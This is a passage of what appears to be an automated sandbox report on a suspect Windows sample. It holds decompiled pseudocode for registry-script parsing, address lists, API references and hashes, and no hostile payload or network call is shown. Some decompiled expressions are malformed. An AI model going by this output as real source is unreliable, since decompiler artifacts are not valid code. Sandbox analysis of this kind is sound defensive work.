									__eflags = _t144;
									if(_t144 != 0) {
										_t240 = 0x5c;
										_t145 = E00EA22D6(_t242, 0x5c);
										__eflags = _t145;
										if(_t145 != 0) {
											L86:
											_t245 = 0x80020009;
											goto L87;
										}
										__eflags = _a12 - _t145;
										if(_a12 == _t145) {
											__eflags = _a16;
											if(_a16 != 0) {
												_t146 = 2;
											} else {
												_t146 = E00EA1629( &_v4404, _v4388, _t242, 0x20019);
												_t197 = _v4404;
											}
											_v4392 = _t146;
											__eflags = _t146;
											_t212 =  ==  ? _a16 : 1;
											_v4420 =  ==  ? _a16 : 1;
											E00EA1285(E00EA770F( &_v280, 0x104, _t242, 0xffffffff));
											_t252 = _t252 + 0x14;
											_t245 = E00EA2327(_v4380, _t242);
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											} else {
												_t214 = _v4380;
												_t245 = E00EA297D(_t197, _v4380, _t240, _t242);
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												__eflags =  *_t242 - 0x7b;
												if( *_t242 != 0x7b) {
													L67:
													_t152 = _v4392;
													__eflags = _t152 - 2;
													if(_t152 == 2) {
														continue;
													}
													__eflags = _t152;
													if(_t152 == 0) {
														__eflags = _a16;
														if(_a16 == 0) {
															L76:
															_t225 = E00EA2948(_t214, _t197);
															_t152 = 0;
															_v4392 = _t225;
															__eflags = _t197;
															if(_t197 != 0) {
																_t152 = RegCloseKey(_t197);
																_t225 = _v4392;
																_t197 = 0;
																__eflags = 0;
																_v4404 = 0;
															}
															_v4400 = _v4400 & 0x00000000;
															__eflags = _t152;
															if(_t152 != 0) {
																L48:
																_t245 = E00EA12D7(_t152);
																goto L87;
															} else {
																__eflags = _v4384 - _t152;
																if(_v4384 == _t152) {
																	continue;
																}
																__eflags = _t225;
																if(_t225 != 0) {
																	continue;
																}
																_v4456 = _v4456 & _t225;
																_v4452 = _v4452 & _t225;
																_v4460 = _v4388;
																_t152 = E00EA1596( &_v4460,  &_v280);
																_v4460 = _v4460 & 0x00000000;
																__eflags = _t152;
																if(_t152 != 0) {
																	goto L48;
																}
																continue;
															}
														}
														_t157 = E00EA2948(_t214, _t197);
														__eflags = _t157;
														if(_t157 == 0) {
															goto L76;
														}
														_t159 = E00EA2919( &_v280);
														__eflags = _t159;
														if(_t159 != 0) {
															__eflags = _v4384;
															if(__eflags != 0) {
																E00EA1685( &_v4404, _t240, _t242, __eflags,  &_v280);
																_t197 = _v4404;
															}
														}
														continue;
													}
													__eflags = _a16;
													if(_a16 == 0) {
														goto L48;
													}
													continue;
												}
												_t162 = E00EA74D0(_t242);
												_pop(_t214);
												__eflags = _t162 - 1;
												if(_t162 != 1) {
													goto L67;
												}
												_t245 = E00EA2DA0(_v4380, _t240, _t242, _t197, 0, _v4420);
												__eflags = _t245;
												if(_t245 >= 0) {
													L66:
													_t214 = _v4380;
													_t245 = E00EA2327(_v4380, _t242);
													__eflags = _t245;
													if(_t245 < 0) {
														goto L87;
													}
													goto L67;
												}
												__eflags = _v4420;
												if(_v4420 == 0) {
													goto L87;
												}
												goto L66;
											}
										}
										_t199 = _v4388;
										_t165 = E00EA1629( &_v4404, _t199, _t242, 0x2001f);
										__eflags = _t165;
										if(_t165 == 0) {
											L49:
											_t197 = _v4404;
											L50:
											_t245 = E00EA2327(_v4380, _t242);
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											}
											__eflags =  *_t242 - 0x3d;
											if( *_t242 != 0x3d) {
												L53:
												__eflags =  *_t242 - 0x7b;
												if( *_t242 != 0x7b) {
													continue;
												}
												_t167 = E00EA74D0(_t242);
												__eflags = _t167 - 1;
												if(_t167 != 1) {
													continue;
												}
												_t245 = E00EA2DA0(_v4380, _t240, _t242, _t197, _a12, 0);
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												_t169 = E00EA2327(_v4380, _t242);
												L33:
												_t245 = _t169;
												__eflags = _t245;
												if(_t245 < 0) {
													goto L87;
												}
												continue;
											}
											_t171 = E00EA2440(_v4380,  &_v4404, 0, _t242);
											_t197 = _v4404;
											_t245 = _t171;
											__eflags = _t245;
											if(_t245 < 0) {
												goto L87;
											}
											goto L53;
										}
										_t172 = E00EA1629( &_v4404, _t199, _t242, 0x20019);
										__eflags = _t172;
										if(_t172 == 0) {
											goto L49;
										}
										_t235 = _v4396;
										_push( &_v4448);
										_v4384 = 0;
										_push( &_v4384);
										__eflags = _v4396;
										if(_v4396 == 0) {
											_t152 = RegCreateKeyExA(_t199, _t242, 0, 0, 0, 0x2001f, 0, ??, ??);
										} else {
											_t252 = _t252 - 0x14;
											_push(_t242);
											_push(_t199);
											_t152 = E00EA1348(_t235);
										}
										__eflags = _t152;
										if(_t152 != 0) {
											_t197 = _v4404;
										} else {
											_t152 = 0;
											__eflags = _v4404;
											if(_v4404 != 0) {
												_t152 = RegCloseKey(_v4404);
											}
											_t197 = _v4384;
											_v4404 = _t197;
											_v4400 = 0;
										}
										__eflags = _t152;
										if(_t152 == 0) {
											goto L50;
										} else {
											goto L48;
										}
									}
									_t245 = E00EA2327(_v4380,  &_v4376);
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									_t245 = E00EA2327(_v4380, _t242);
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									__eflags =  *_t242 - 0x3d;
									if( *_t242 != 0x3d) {
										goto L86;
									}
									__eflags = _a12;
									if(_a12 == 0) {
										__eflags = _a16;
										if(_a16 != 0) {
											L32:
											_t169 = E00EA297D(_t197, _v4380, _t240, _t242);
											goto L33;
										}
										__eflags = _v4384;
										if(_v4384 == 0) {
											goto L32;
										}
										_v4416 = 0;
										_v4412 = 0;
										_v4408 = 0;
										_t179 = E00EA1629( &_v4416, _v4388, 0, 0x20006);
										__eflags = _t179;
										if(_t179 != 0) {
											L84:
											_t180 = E00EA12D7(_t179);
											__eflags = _v4416;
											_t245 = _t180;
											if(_v4416 != 0) {
												RegCloseKey(_v4416);
											}
											goto L87;
										}
										_t250 = _v4416;
										_t179 = RegDeleteValueA(_t250,  &_v4376);
										__eflags = _t179;
										if(_t179 == 0) {
											L29:
											__eflags = _t250;
											if(_t250 != 0) {
												RegCloseKey(_t250);
												_t59 =  &_v4416;
												 *_t59 = _v4416 & 0x00000000;
												__eflags =  *_t59;
											}
											_t61 =  &_v4412;
											 *_t61 = _v4412 & 0x00000000;
											__eflags =  *_t61;
											goto L32;
										}
										__eflags = _t179 - 2;
										if(_t179 != 2) {
											goto L84;
										}
										goto L29;
									}
									_v8 = 1;
									_v4440 = _v4440 & 0x00000000;
									_v4436 = _v4436 & 0x00000000;
									_v4444 = _v4388;
									_t245 = E00EA2440(_v4380,  &_v4444,  &_v4376, _t242);
									_v4444 = 0;
									_v4440 = 0;
									_v4436 = 0;
									__eflags = _t245;
									if(_t245 < 0) {
										goto L87;
									}
									_v8 = 0;
									_v4440 = 0;
									goto L53;
								}
								_v4384 = _t248;
								_t245 = E00EA2327(_v4380, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								goto L17;
							}
							_t240 = 0x5c;
							_v4432 = 0;
							_v4424 = 0;
							_t190 = E00EA22D6(_t242, 0x5c);
							__eflags = _t190;
							if(_t190 != 0) {
								goto L86;
							} else {
								__eflags = E00EA2919(_t242);
								if(__eflags != 0) {
									_v4432 = _v4388;
									_v4428 = 0;
									E00EA1685( &_v4432, 0x5c, _t242, __eflags, _t242);
									_v4432 = 0;
									_v4424 = 0;
								}
								__eflags = _v4392 - _t248;
								if(_v4392 == _t248) {
									_v4428 = _t248;
									goto L15;
								}
								_t245 = E00EA2327(_v4380, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								_t245 = E00EA297D(_t197, _v4380, _t240, _t242);
								__eflags = _t245;
								if(_t245 < 0) {
									goto L87;
								}
								_v4428 = _v4428 & 0x00000000;
								goto L53;
							}
						}
						__eflags = _t247;
						if(_t247 == 0) {
							_t248 = 0;
							__eflags = 0;
							goto L15;
						}
						goto L4;
					}
					goto L87;
				}
			}

0x00ea2da0
0x00ea2da3
0x00ea2da5
0x00ea2db0
0x00ea2db6
0x00ea2dbb
0x00ea2dc0
0x00ea2dc2
0x00ea2dc8
0x00ea2dcc
0x00ea2dd4
0x00ea2ddd
0x00ea2de0
0x00ea2de8
0x00ea2dea
0x00ea2df0
0x00ea2df6
0x00ea2dfc
0x00ea2e07
0x00ea2e0b
0x00ea33e4
0x00ea33e9
0x00ea33f1
0x00ea33f2
0x00ea33f3
0x00ea33ff
0x00ea2e11
0x00ea33a9
0x00ea2e1c
0x00ea2e26
0x00ea2e33
0x00ea2e35
0x00ea2e37
0x00ea2e3d
0x00ea2e43
0x00ea2e45
0x00ea2e4f
0x00ea2e5b
0x00ea2e5d
0x00ea2e5f
0x00ea33d9
0x00ea33db
0x00ea33de
0x00ea33de
0x00000000
0x00ea33db
0x00ea2e65
0x00ea2e67
0x00ea2e6a
0x00ea2f0b
0x00ea2f11
0x00ea2f17
0x00ea2f19
0x00ea2f37
0x00ea2f3d
0x00ea2f43
0x00ea2f45
0x00ea3087
0x00ea308b
0x00ea3090
0x00ea3092
0x00ea33d4
0x00ea33d4
0x00000000
0x00ea33d4
0x00ea3098
0x00ea309b
0x00ea31ea
0x00ea31ee
0x00ea3211
0x00ea31f0
0x00ea3202
0x00ea3207
0x00ea3207
0x00ea3214
0x00ea321d
0x00ea3220
0x00ea3230
0x00ea323c
0x00ea3247
0x00ea3250
0x00ea3252
0x00ea3254
0x00000000
0x00ea325a
0x00ea325a
0x00ea3266
0x00ea3268
0x00ea326a
0x00000000
0x00000000
0x00ea3270
0x00ea3273
0x00ea32bf
0x00ea32bf
0x00ea32c5
0x00ea32c8
0x00000000
0x00000000
0x00ea32ce
0x00ea32d0
0x00ea32e1
0x00ea32e5
0x00ea332c
0x00ea3332
0x00ea3334
0x00ea3336
0x00ea333c
0x00ea333e
0x00ea3341
0x00ea3347
0x00ea334d
0x00ea334d
0x00ea334f
0x00ea334f
0x00ea3355
0x00ea335c
0x00ea335e
0x00ea3150
0x00ea3157
0x00000000
0x00ea3364
0x00ea3364
0x00ea336a
0x00000000
0x00000000
0x00ea336c
0x00ea336e
0x00000000
0x00000000
0x00ea3376
0x00ea337c
0x00ea3388
0x00ea3395
0x00ea339a
0x00ea33a1
0x00ea33a3
0x00000000
0x00000000
0x00000000
0x00ea33a3
0x00ea335e
0x00ea32e8
0x00ea32ed
0x00ea32ef
0x00000000
0x00000000
0x00ea32f8
0x00ea32fd
0x00ea32ff
0x00ea3305
0x00ea330c
0x00ea331f
0x00ea3324
0x00ea3324
0x00ea330c
0x00000000
0x00ea32ff
0x00ea32d2
0x00ea32d6
0x00000000
0x00000000
0x00000000
0x00ea32dc
0x00ea3276
0x00ea327b
0x00ea327c
0x00ea327f
0x00000000
0x00000000
0x00ea3296
0x00ea3298
0x00ea329a
0x00ea32a9
0x00ea32a9
0x00ea32b5
0x00ea32b7
0x00ea32b9
0x00000000
0x00000000
0x00000000
0x00ea32b9
0x00ea329c
0x00ea32a3
0x00000000
0x00000000
0x00000000
0x00ea32a3
0x00ea3254
0x00ea30a1
0x00ea30b4
0x00ea30b9
0x00ea30bb
0x00ea315e
0x00ea315e
0x00ea3164
0x00ea3170
0x00ea3172
0x00ea3174
0x00000000
0x00000000
0x00ea317a
0x00ea317d
0x00ea31a4
0x00ea31a4
0x00ea31a7
0x00000000
0x00000000
0x00ea31ae
0x00ea31b4
0x00ea31b7
0x00000000
0x00000000
0x00ea31cf
0x00ea31d1
0x00ea31d3
0x00000000
0x00000000
0x00ea31e0
0x00ea3078
0x00ea3078
0x00ea307a
0x00ea307c
0x00000000
0x00000000
0x00000000
0x00ea3082
0x00ea318f
0x00ea3194
0x00ea319a
0x00ea319c
0x00ea319e
0x00000000
0x00000000
0x00000000
0x00ea319e
0x00ea30ce
0x00ea30d3
0x00ea30d5
0x00000000
0x00000000
0x00ea30db
0x00ea30e7
0x00ea30f0
0x00ea30f6
0x00ea30f7
0x00ea30f9
0x00ea3112
0x00ea30fb
0x00ea30fb
0x00ea30fe
0x00ea30ff
0x00ea3100
0x00ea3100
0x00ea3118
0x00ea311a
0x00ea3146
0x00ea311c
0x00ea311c
0x00ea311e
0x00ea3124
0x00ea312c
0x00ea312c
0x00ea3132
0x00ea3138
0x00ea313e
0x00ea313e
0x00ea314c
0x00ea314e
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea314e
0x00ea2f5d
0x00ea2f5f
0x00ea2f61
0x00000000
0x00000000
0x00ea2f73
0x00ea2f75
0x00ea2f77
0x00000000
0x00000000
0x00ea2f7d
0x00ea2f80
0x00000000
0x00000000
0x00ea2f86
0x00ea2f8a
0x00ea2ff0
0x00ea2ff4
0x00ea306c
0x00ea3073
0x00000000
0x00ea3073
0x00ea2ff6
0x00ea2ffd
0x00000000
0x00000000
0x00ea3013
0x00ea3019
0x00ea301f
0x00ea3025
0x00ea302a
0x00ea302c
0x00ea33b4
0x00ea33b6
0x00ea33bb
0x00ea33c2
0x00ea33c4
0x00ea33cc
0x00ea33cc
0x00000000
0x00ea33c4
0x00ea3032
0x00ea3040
0x00ea3046
0x00ea3048
0x00ea3053
0x00ea3053
0x00ea3055
0x00ea3058
0x00ea305e
0x00ea305e
0x00ea305e
0x00ea305e
0x00ea3065
0x00ea3065
0x00ea3065
0x00000000
0x00ea3065
0x00ea304a
0x00ea304d
0x00000000
0x00000000
0x00000000
0x00ea304d
0x00ea2f98
0x00ea2f9c
0x00ea2fa3
0x00ea2faa
0x00ea2fc4
0x00ea2fc8
0x00ea2fce
0x00ea2fd4
0x00ea2fda
0x00ea2fdc
0x00000000
0x00000000
0x00ea2fe2
0x00ea2fe5
0x00000000
0x00ea2fe5
0x00ea2f22
0x00ea2f2d
0x00ea2f2f
0x00ea2f31
0x00000000
0x00000000
0x00000000
0x00ea2f31
0x00ea2e70
0x00ea2e72
0x00ea2e7a
0x00ea2e80
0x00ea2e85
0x00ea2e87
0x00000000
0x00ea2e8d
0x00ea2e93
0x00ea2e95
0x00ea2ea4
0x00ea2eaa
0x00ea2eb0
0x00ea2eb5
0x00ea2ebb
0x00ea2ebb
0x00ea2ec1
0x00ea2ec7
0x00ea2f01
0x00000000
0x00ea2f01
0x00ea2ed5
0x00ea2ed7
0x00ea2ed9
0x00000000
0x00000000
0x00ea2eeb
0x00ea2eed
0x00ea2eef
0x00000000
0x00000000
0x00ea2ef5
0x00000000
0x00ea2ef5
0x00ea2e87
0x00ea2e47
0x00ea2e49
0x00ea2f09
0x00ea2f09
0x00000000
0x00ea2f09
0x00000000
0x00ea2e49
0x00000000
0x00ea33b2

APIs

Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5

lstrcmpiA.KERNEL32 ref: 00EA2E26
lstrcmpiA.KERNEL32(?,ForceRemove), ref: 00EA2E3D
_strlen.LIBCMT ref: 00EA31AE
RegCloseKey.ADVAPI32(00000000,?), ref: 00EA33DE

Strings

Delete, xrefs: 00EA2E16
Val, xrefs: 00EA2F37
ForceRemove, xrefs: 00EA2E2E
NoRemove, xrefs: 00EA2F0B

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CharNext$lstrcmpi$Close_strlen
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 3980308911-1781481701
Opcode ID: 690fd1aa92b5d6d020090d526560bdea087e275d0de7601b2e3b6a3669c63f02
Instruction ID: e93e7b87e75829283af6df77aa21b3f9926469f873752fe8d65061f86d6dfdd6
Opcode Fuzzy Hash: 690fd1aa92b5d6d020090d526560bdea087e275d0de7601b2e3b6a3669c63f02
Instruction Fuzzy Hash: 47F14E71D012299BCF399B658C41BEEB6B4AF4EB54F0011D9FA15BA241DB34AF84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2440 Relevance: 21.4, APIs: 14, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00EA2440(int __ecx, void** _a4, char* _a8, intOrPtr _a12) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v4120;
				char _v4376;
				int _v4380;
				int _v4384;
				int _v4388;
				char _v4392;
				char* _v4396;
				void** _v4400;
				int _v4404;
				char _v4408;
				intOrPtr _v4412;
				void* _v4428;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t95;
				signed int _t96;
				char* _t106;
				int _t109;
				char* _t112;
				char* _t113;
				signed char _t115;
				char* _t118;
				signed char _t124;
				char* _t129;
				char* _t132;
				char* _t133;
				intOrPtr _t134;
				char* _t142;
				void* _t147;
				void* _t152;
				long _t154;
				CHAR* _t155;
				char* _t157;
				char _t158;
				int _t162;
				void* _t163;
				char* _t164;
				int _t165;
				char* _t166;
				char* _t179;
				void* _t185;
				char _t201;
				void** _t208;
				void* _t209;
				char* _t214;
				char* _t215;
				char* _t216;
				CHAR* _t217;
				int _t218;
				char* _t220;
				void* _t221;
				int _t223;
				char* _t225;
				char* _t226;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t231;

				_push(0xffffffff);
				_push(0xeb088d);
				_push( *[fs:0x0]);
				_push(__ecx);
				E00EB02C0(0x1128);
				_t95 =  *0xeb9008; // 0x64e1d101
				_t96 = _t95 ^ _t227;
				_v24 = _t96;
				_push(_t96);
				 *[fs:0x0] =  &_v16;
				_v20 = _t228;
				_v4404 = __ecx;
				_t162 = 0;
				_t208 = _a4;
				_t220 = _a8;
				_v4412 = _a12;
				_v4388 = __ecx;
				_v4400 = _t208;
				_v4396 = _t220;
				_v4384 = 0;
				if(E00EA2327(__ecx,  &_v4120) >= 0) {
					_t203 =  &_v4384;
					if(E00EA21F6( &_v4120, _t203) != 0) {
						E00EA22FE(_v4404);
						_t100 = E00EA2327(_v4404,  &_v4120);
						__eflags = _t100;
						if(_t100 >= 0) {
							_t106 = (_v4384 & 0x0000ffff) - 8;
							__eflags = _t106;
							if(_t106 == 0) {
								_t109 = E00EA74D0( &_v4120) + 1;
								__eflags = _t109;
								_t164 = RegSetValueExA( *_t208, _t220, 0, 1,  &_v4120, _t109);
								goto L62;
							} else {
								_t113 = _t106 - 9;
								__eflags = _t113;
								if(_t113 == 0) {
									_t115 = E00EA74D0( &_v4120);
									_v4384 = _t115;
									__eflags = _t115 & 0x00000001;
									if((_t115 & 0x00000001) != 0) {
										L54:
										_t100 = 0x80004005;
									} else {
										asm("cdq");
										_v4380 = 0;
										_t223 = _t115 - _t203 >> 1;
										_v4392 = _t223;
										_v8 = 4;
										_v8 = 5;
										__eflags = E00EA3D42(_t223) - 0x100;
										if(__eflags <= 0) {
											_t118 =  &_v4376;
											_v4380 = _t118;
										} else {
											E00EA3D1D( &_v4380, _t223, __eflags, _t117);
											_t118 = _v4380;
										}
										__eflags = _t118;
										if(_t118 != 0) {
											E00EA5210(_t208, _t118, _t162, _t223);
											_v4388 = _t162;
											__eflags = _v4384;
											_t203 = _t162;
											if(_v4384 > 0) {
												_t165 = _v4384;
												do {
													_t124 = E00EA2256();
													_t185 = 4;
													 *((_t203 >> 1) + _v4380) =  *((_t203 >> 1) + _v4380) | _t124 << _t185 - ((_t203 & 0x00000001) << 0x00000002);
													_t203 =  &(_v4388[1]);
													_v4388 = _t203;
													__eflags = _t203 - _t165;
												} while (_t203 < _t165);
												_t223 = _v4392;
												_t162 = 0;
												__eflags = 0;
											}
											_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 3, _v4380, _t223);
											__eflags = _v4380 -  &_v4376;
											if(_v4380 !=  &_v4376) {
												E00EA3D14( &_v4380);
											}
											goto L62;
										} else {
											E00EA3D14( &_v4380);
											goto L54;
										}
									}
								} else {
									_t129 = _t113;
									__eflags = _t129;
									if(_t129 == 0) {
										_t225 = 0;
										_v4388 = 0;
										_v8 = 3;
										_t132 = E00EA74D0( &_v4120) + 1;
										_t203 = _t132;
										_v4384 = _t132;
										_t133 = E00EA1181( &_v4384, _t132);
										_t231 = _t228 + 4;
										__eflags = _t133;
										if(_t133 < 0) {
											L39:
											_t100 = 0x8007000e;
										} else {
											_t212 = _v4384;
											__eflags = _v4384 - 0x400;
											if(__eflags > 0) {
												L35:
												_t134 = E00EA3CD7( &_v4388, _t225, _t212);
												_t225 = _v4388;
											} else {
												_t142 = E00EA11AE(0, _t212, _t212, 0, __eflags);
												__eflags = _t142;
												if(_t142 == 0) {
													goto L35;
												} else {
													E00EB02F0(_t212);
													_v20 = _t231;
													_t134 = _t231;
												}
											}
											_t203 =  &_v4120;
											_t100 = E00EA121E(_t134,  &_v4120, _t212 >> 1, 3);
											__eflags = _t100;
											if(_t100 != 0) {
												__imp__#277(_t100, _t162, _t162,  &_v4408);
												_v4392 = _t100;
												__eflags = _t100;
												if(_t100 >= 0) {
													_v4392 = _v4408;
													_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 4,  &_v4392, 4);
													__eflags = _t225;
													if(_t225 != 0) {
														do {
															_t214 =  *_t225;
															_t225 = _t214;
															E00EA7188(_t225);
															__eflags = _t214;
														} while (_t214 != 0);
													}
													goto L62;
												} else {
													__eflags = _t225;
													if(_t225 != 0) {
														do {
															_t215 =  *_t225;
															_t225 = _t215;
															E00EA7188(_t225);
															__eflags = _t215;
														} while (_t215 != 0);
														_t100 = _v4392;
													}
												}
											} else {
												__eflags = _t225;
												if(_t225 != 0) {
													do {
														_t216 =  *_t225;
														_t225 = _t216;
														E00EA7188(_t225);
														__eflags = _t216;
													} while (_t216 != 0);
												}
												goto L39;
											}
										}
									} else {
										__eflags = _t129 != 0x3ff5;
										if(_t129 != 0x3ff5) {
											L64:
											_t112 = E00EA2327(_v4404, _v4412);
											__eflags = _t112;
											_t179 =  <  ? _t112 : 0;
											__eflags = _t179;
											_t100 = _t179;
										} else {
											_t147 = E00EA74D0( &_v4120);
											_v4380 = 0;
											_v8 = 0;
											_t23 = _t147 + 2; // 0x2
											_v8 = 1;
											__eflags = E00EA3D42(_t23) - 0x100;
											if(__eflags <= 0) {
												_t226 =  &_v4376;
												_v4380 = _t226;
											} else {
												E00EA3D1D( &_v4380, _t220, __eflags, _t148);
												_t226 = _v4380;
											}
											__eflags = _t226;
											if(_t226 == 0) {
												_push(0xe);
												goto L28;
											} else {
												__eflags = _v4120;
												_t217 =  &_v4120;
												if(_v4120 != 0) {
													do {
														_t155 = CharNextA(_t217);
														_t201 =  *_t217;
														__eflags = _t201 - 0x5c;
														if(_t201 != 0x5c) {
															L17:
															 *_t226 = _t201;
															_t157 = IsDBCSLeadByte( *_t217 & 0x000000ff);
															__eflags = _t157;
															if(_t157 == 0) {
																L20:
																_t217 =  &(_t217[1]);
																__eflags = _t217;
																goto L21;
															} else {
																_t226 =  &(_t226[1]);
																_t217 =  &(_t217[1]);
																_t158 =  *_t217;
																__eflags = _t158;
																if(_t158 != 0) {
																	 *_t226 = _t158;
																	goto L20;
																}
															}
														} else {
															__eflags =  *_t155 - 0x30;
															if( *_t155 != 0x30) {
																goto L17;
															} else {
																 *_t226 = _t162;
																_t217 = CharNextA(_t155);
																goto L21;
															}
														}
														goto L22;
														L21:
														_t226 =  &(_t226[1]);
														__eflags =  *_t217;
													} while ( *_t217 != 0);
												}
												L22:
												 *_t226 = 0;
												_t226 = _v4380;
												__eflags = _t226;
												if(_t226 != 0) {
													_t218 = _t162;
													_t166 = _t226;
													do {
														_t152 = E00EA74D0(_t166) + 1;
														_t166 =  &(_t166[_t152]);
														_t218 = _t218 + _t152;
														__eflags = _t152 - 1;
													} while (_t152 != 1);
													_t154 = RegSetValueExA( *_v4400, _v4396, 0, 7, _t226, _t218);
													_t226 = _v4380;
													_t164 = _t154;
												} else {
													_push(0xd);
													L28:
													_pop(_t164);
												}
											}
											__eflags = _t226 -  &_v4376;
											if(_t226 !=  &_v4376) {
												E00EA3D14( &_v4380);
											}
											L62:
											__eflags = _t164;
											if(_t164 == 0) {
												goto L64;
											} else {
												_t100 = E00EA12D7(_t164);
											}
										}
									}
								}
							}
						}
					} else {
						_t100 = 0x80020009;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t209);
				_pop(_t221);
				_pop(_t163);
				return E00EA403C(_t100, _t163, _v24 ^ _t227, _t203, _t209, _t221);
			}

0x00ea2443
0x00ea2445
0x00ea2450
0x00ea2451
0x00ea2457
0x00ea245c
0x00ea2461
0x00ea2463
0x00ea2469
0x00ea246d
0x00ea2473
0x00ea2476
0x00ea247f
0x00ea2481
0x00ea2484
0x00ea2487
0x00ea2494
0x00ea249a
0x00ea24a0
0x00ea24a6
0x00ea24b3
0x00ea24b9
0x00ea24cc
0x00ea24de
0x00ea24f0
0x00ea24f5
0x00ea24f7
0x00ea2504
0x00ea2504
0x00ea2507
0x00ea28b9
0x00ea28b9
0x00ea28ce
0x00000000
0x00ea250d
0x00ea250d
0x00ea250d
0x00ea2510
0x00ea277f
0x00ea2784
0x00ea278b
0x00ea278d
0x00ea2806
0x00ea2806
0x00ea278f
0x00ea278f
0x00ea2792
0x00ea279a
0x00ea279c
0x00ea27a2
0x00ea27ab
0x00ea27b4
0x00ea27b9
0x00ea27c9
0x00ea27cf
0x00ea27bb
0x00ea27c2
0x00ea27f1
0x00ea27f1
0x00ea27f7
0x00ea27f9
0x00ea2813
0x00ea281b
0x00ea2821
0x00ea2828
0x00ea282a
0x00ea282c
0x00ea2832
0x00ea2843
0x00ea2850
0x00ea285b
0x00ea285e
0x00ea285f
0x00ea2865
0x00ea2865
0x00ea2869
0x00ea286f
0x00ea286f
0x00ea286f
0x00ea288f
0x00ea2897
0x00ea289d
0x00ea28a5
0x00ea28a5
0x00000000
0x00ea27fb
0x00ea2801
0x00000000
0x00ea2801
0x00ea27f9
0x00ea2516
0x00ea2517
0x00ea2517
0x00ea251a
0x00ea2650
0x00ea2652
0x00ea265e
0x00ea266b
0x00ea2672
0x00ea2674
0x00ea267a
0x00ea267f
0x00ea2682
0x00ea2684
0x00ea26e8
0x00ea26e8
0x00ea2686
0x00ea2686
0x00ea268c
0x00ea2692
0x00ea26ad
0x00ea26b4
0x00ea26b9
0x00ea2694
0x00ea2696
0x00ea269b
0x00ea269d
0x00000000
0x00ea269f
0x00ea26a1
0x00ea26a6
0x00ea26a9
0x00ea26a9
0x00ea269d
0x00ea26c3
0x00ea26cc
0x00ea26d1
0x00ea26d3
0x00ea26fc
0x00ea2702
0x00ea2708
0x00ea270a
0x00ea2736
0x00ea275a
0x00ea275c
0x00ea275e
0x00ea2764
0x00ea2764
0x00ea2767
0x00ea2769
0x00ea276f
0x00ea276f
0x00ea2773
0x00000000
0x00ea270c
0x00ea270c
0x00ea270e
0x00ea2714
0x00ea2714
0x00ea2717
0x00ea2719
0x00ea271f
0x00ea271f
0x00ea2723
0x00ea2723
0x00ea270e
0x00ea26d5
0x00ea26d5
0x00ea26d7
0x00ea26d9
0x00ea26d9
0x00ea26dc
0x00ea26de
0x00ea26e4
0x00ea26e4
0x00ea26d9
0x00000000
0x00ea26d7
0x00ea26d3
0x00ea2520
0x00ea2520
0x00ea2525
0x00ea28dd
0x00ea28e9
0x00ea28f0
0x00ea28f2
0x00ea28f2
0x00ea28f5
0x00ea252b
0x00ea2532
0x00ea2538
0x00ea253e
0x00ea2541
0x00ea2544
0x00ea254d
0x00ea2552
0x00ea2562
0x00ea2568
0x00ea2554
0x00ea255b
0x00ea2584
0x00ea2584
0x00ea258a
0x00ea258c
0x00ea262f
0x00000000
0x00ea2592
0x00ea2592
0x00ea2599
0x00ea259f
0x00ea25a1
0x00ea25a2
0x00ea25a8
0x00ea25aa
0x00ea25ad
0x00ea25c1
0x00ea25c1
0x00ea25c7
0x00ea25cd
0x00ea25cf
0x00ea25db
0x00ea25db
0x00ea25db
0x00000000
0x00ea25d1
0x00ea25d1
0x00ea25d2
0x00ea25d3
0x00ea25d5
0x00ea25d7
0x00ea25d9
0x00000000
0x00ea25d9
0x00ea25d7
0x00ea25af
0x00ea25af
0x00ea25b2
0x00000000
0x00ea25b4
0x00ea25b5
0x00ea25bd
0x00000000
0x00ea25bd
0x00ea25b2
0x00000000
0x00ea25dc
0x00ea25dc
0x00ea25dd
0x00ea25dd
0x00ea25a1
0x00ea25e2
0x00ea25e2
0x00ea25e7
